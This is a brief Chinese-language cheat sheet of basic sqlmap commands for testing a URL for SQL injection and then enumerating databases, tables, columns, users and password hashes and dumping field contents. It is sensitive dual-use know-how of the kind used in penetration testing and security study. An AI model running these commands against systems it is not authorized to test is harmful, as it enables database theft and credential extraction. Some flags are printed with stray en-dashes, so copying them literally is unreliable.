sqlmap基本命令

1. 判断是否存在注入

sqlmap -u url 当注入点后面的参数大于等于两个时，url需要加双引号

1. 查询当前用户下的所有数据库

sqlmap -u url –-dbs 用于查询当前用户下的所有数据库，前提是当前用户有权限读取包含所有数据库列表信息的表

1. 获取数据库中的表名

sqlmap -u url -D 数据库名 –-tables -D是指定某一个具体的数据库，如果没有指定，则会列出数据库中所有的库的表

1. 获取表中的字段名

sqlmap -u URL -D 数据库名 -T 表名 –-columns

1. 获取字段内容

sqlmap -u URL -D 数据库名 -T 表名 -C 字段名1,字段名2 –-dump

1. 获取数据库的所有用户

sqlmap -u URL –-users 前提是当前用户有权限读取包含所有用户的表的权限

1. 获取数据库用户的密码

sqlmap -u url –passwords 列出数据库用户的密码，前提是当前用户有读取包含用户密码的权限

1. 获取当前网站数据库的名称

sqlmap -u URL –-current-db

1. 获取当前网站数据库的用户名称

sqlmap -u URL –-current-user